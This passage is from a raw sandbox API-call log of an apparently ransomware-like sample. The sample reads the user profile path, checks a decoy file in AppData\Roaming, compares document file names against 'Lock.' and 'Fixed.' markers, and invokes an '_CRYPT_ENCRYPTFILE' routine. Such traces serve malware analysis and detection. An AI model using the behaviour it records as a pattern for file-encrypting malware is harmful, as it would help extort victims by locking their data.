ftLastWriteTime.dwHighDateTime=0x1d5e11e, nFileSizeHigh=0x0, nFileSizeLow=0x3f24, dwReserved0=0x1, dwReserved1=0x1c, cFileName="ATHv.mp4", cAlternateFileName="")) returned 0 [0224.185] FindClose (in: hFindFile=0xa87050 | out: hFindFile=0xa87050) returned 1 [0224.185] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e58910 | out: hHeap=0x970000) returned 1 [0224.185] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0224.186] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e503e0 | out: hHeap=0x970000) returned 1 [0224.186] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50578 | out: hHeap=0x970000) returned 1 [0224.186] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50560 | out: hHeap=0x970000) returned 1 [0224.186] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0224.186] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50548 [0224.186] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50698 [0224.186] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c18 [0224.186] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf560, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0224.186] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50560 [0224.186] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79310 [0224.186] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b98 [0224.186] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bb8 [0224.186] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e698c8 [0224.186] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e503e0 [0224.186] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x90) returned 0x2e58910 [0224.187] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79310 | out: hHeap=0x970000) returned 1 [0224.187] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e503e0 | out: hHeap=0x970000) returned 1 [0224.187] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bc8 [0224.187] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0224.187] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50470 [0224.187] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50470 | out: hHeap=0x970000) returned 1 [0224.187] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e698c8 | out: hHeap=0x970000) returned 1 [0224.187] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0224.187] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0224.187] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50620 [0224.187] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c48 [0224.187] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0224.187] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x52) returned 0x2e564e0 [0224.187] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy/AppData/Roaming/ATHv.mp4", nBufferLength=0x104, lpBuffer=0x8cf65c, lpFilePart=0x8cf650 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Roaming\\ATHv.mp4", lpFilePart=0x8cf650*="ATHv.mp4") returned 0x28 [0224.187] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e564e0 | out: hHeap=0x970000) returned 1 [0224.187] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\ATHv.mp4" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\athv.mp4")) returned 0xffffffff [0224.188] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e58910 | out: hHeap=0x970000) returned 1 [0224.188] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0224.188] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50560 | out: hHeap=0x970000) returned 1 [0224.188] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50698 | out: hHeap=0x970000) returned 1 [0224.188] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50620 | out: hHeap=0x970000) returned 1 [0224.188] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50548 | out: hHeap=0x970000) returned 1 [0224.188] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0224.188] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77ac8 | out: hHeap=0x970000) returned 1 [0224.188] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0224.188] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0224.188] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cf8 [0224.188] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c18 [0224.188] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e503c8 [0224.188] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50668 [0224.188] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bb8 [0224.188] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c48 [0224.188] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0224.188] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50698 [0224.188] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0224.188] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505d8 [0224.188] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b98 [0224.189] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50620 [0224.189] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0224.189] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="bbPMuZmaU.xlsx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0224.189] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="bPMuZmaU.xlsx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0224.189] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PMuZmaU.xlsx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0224.189] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MuZmaU.xlsx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0224.189] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="uZmaU.xlsx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0224.189] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ZmaU.xlsx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0224.189] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="maU.xlsx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0224.189] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="aU.xlsx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0224.189] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="U.xlsx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0224.189] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".xlsx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0224.189] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50698 | out: hHeap=0x970000) returned 1 [0224.189] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50668 | out: hHeap=0x970000) returned 1 [0224.189] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50620 | out: hHeap=0x970000) returned 1 [0224.189] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505d8 | out: hHeap=0x970000) returned 1 [0224.189] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e503c8 | out: hHeap=0x970000) returned 1 [0224.189] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0224.189] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0224.189] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77588 [0224.189] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0224.190] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bb8 [0224.190] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50548 [0224.190] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50578 [0224.190] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b48 [0224.190] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b58 [0224.190] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0224.190] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50428 [0224.190] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0224.190] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50590 [0224.190] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c48 [0224.190] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e503e0 [0224.190] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0224.190] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50470 [0224.190] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c78 [0224.190] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50560 [0224.190] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c78 | out: hHeap=0x970000) returned 1 [0224.190] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504e8 [0224.190] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b28 [0224.190] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1e) returned 0x2e79310 [0224.190] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b48 [0224.190] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="bbPMuZmaU.xlsx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0224.190] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="bPMuZmaU.xlsx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0224.191] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PMuZmaU.xlsx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0224.191] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MuZmaU.xlsx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0224.191] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="uZmaU.xlsx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0224.191] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ZmaU.xlsx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0224.191] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="maU.xlsx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0224.191] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="aU.xlsx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0224.191] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="U.xlsx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0224.191] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504e8 | out: hHeap=0x970000) returned 1 [0224.191] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79338 [0224.191] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504e8 [0224.191] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79338 | out: hHeap=0x970000) returned 1 [0224.191] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b28 | out: hHeap=0x970000) returned 1 [0224.191] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50428 | out: hHeap=0x970000) returned 1 [0224.191] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50578 | out: hHeap=0x970000) returned 1 [0224.191] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e503e0 | out: hHeap=0x970000) returned 1 [0224.191] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50590 | out: hHeap=0x970000) returned 1 [0224.191] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50560 | out: hHeap=0x970000) returned 1 [0224.197] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50470 | out: hHeap=0x970000) returned 1 [0224.197] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50548 | out: hHeap=0x970000) returned 1 [0224.197] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0224.197] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0224.197] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0224.197] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53728 | out: hHeap=0x970000) returned 1 [0224.197] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53908 [0224.197] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504e8 | out: hHeap=0x970000) returned 1 [0224.197] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0224.197] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f04508 [0224.197] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bc8 [0224.197] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0224.197] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04508 | out: hHeap=0x970000) returned 1 [0224.197] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0224.197] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50668 [0224.197] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54bc8 [0224.197] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504e8 [0224.197] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50578 [0224.198] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c48 [0224.198] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf4d0, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0224.198] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50488 [0224.198] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79338 [0224.198] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cb8 [0224.198] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c98 [0224.198] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69bc8 [0224.198] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50428 [0224.198] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x90) returned 0x2e58910 [0224.198] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79338 | out: hHeap=0x970000) returned 1 [0224.198] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50428 | out: hHeap=0x970000) returned 1 [0224.198] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c78 [0224.198] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c78 | out: hHeap=0x970000) returned 1 [0224.198] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50560 [0224.198] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50560 | out: hHeap=0x970000) returned 1 [0224.198] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69bc8 | out: hHeap=0x970000) returned 1 [0224.198] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0224.198] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0224.198] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54cd8 [0224.198] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50428 [0224.198] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cc8 [0224.198] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf4d0, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0224.199] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50548 [0224.199] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79338 [0224.199] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c88 [0224.199] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b98 [0224.199] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69888 [0224.199] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50590 [0224.199] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xa0) returned 0x2e564e0 [0224.199] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79338 | out: hHeap=0x970000) returned 1 [0224.199] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50590 | out: hHeap=0x970000) returned 1 [0224.199] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505d8 [0224.199] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505d8 | out: hHeap=0x970000) returned 1 [0224.199] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69888 | out: hHeap=0x970000) returned 1 [0224.199] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0224.199] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0224.199] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54c98 [0224.293] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50500 [0224.294] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c08 [0224.294] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505d8 [0224.294] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0224.294] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54cc8 [0224.294] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50590 [0224.294] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ce8 [0224.294] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0224.294] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50560 [0224.294] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79338 [0224.294] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50698 [0224.294] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b28 [0224.294] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50698 | out: hHeap=0x970000) returned 1 [0224.294] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f440 [0224.294] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505f0 [0224.294] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50620 [0224.294] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f7d8 [0224.294] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50638 [0224.294] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ce8 [0224.294] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50638 | out: hHeap=0x970000) returned 1 [0224.294] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f04620 [0224.294] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50638 [0224.294] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50698 [0224.294] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f468 [0224.294] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506b0 [0224.295] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c08 [0224.295] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506b0 | out: hHeap=0x970000) returned 1 [0224.295] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f490 [0224.295] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506b0 [0224.295] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50440 [0224.295] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f710 [0224.295] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e503c8 [0224.295] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ca8 [0224.295] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50458 [0224.295] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0224.295] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0224.295] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e503e0 [0224.295] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c18 [0224.295] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50470 [0224.295] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d10 [0224.295] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c78 [0224.295] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f5d0 [0224.295] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e78 [0224.295] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b98 [0224.295] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f08 [0224.295] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fb0 [0224.295] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e503e0 | out: hHeap=0x970000) returned 1 [0224.295] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f508 [0224.295] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50470 | out: hHeap=0x970000) returned 1 [0224.295] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50470 [0224.296] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e503e0 [0224.296] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cf8 [0224.296] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f3c8 [0224.296] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d28 [0224.296] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bb8 [0224.296] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d28 | out: hHeap=0x970000) returned 1 [0224.296] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f4b8 [0224.296] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e30 [0224.296] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ed8 [0224.296] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f508 | out: hHeap=0x970000) returned 1 [0224.296] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0224.296] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50470 | out: hHeap=0x970000) returned 1 [0224.296] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0224.296] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50470 [0224.296] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b58 [0224.296] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e90 [0224.296] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 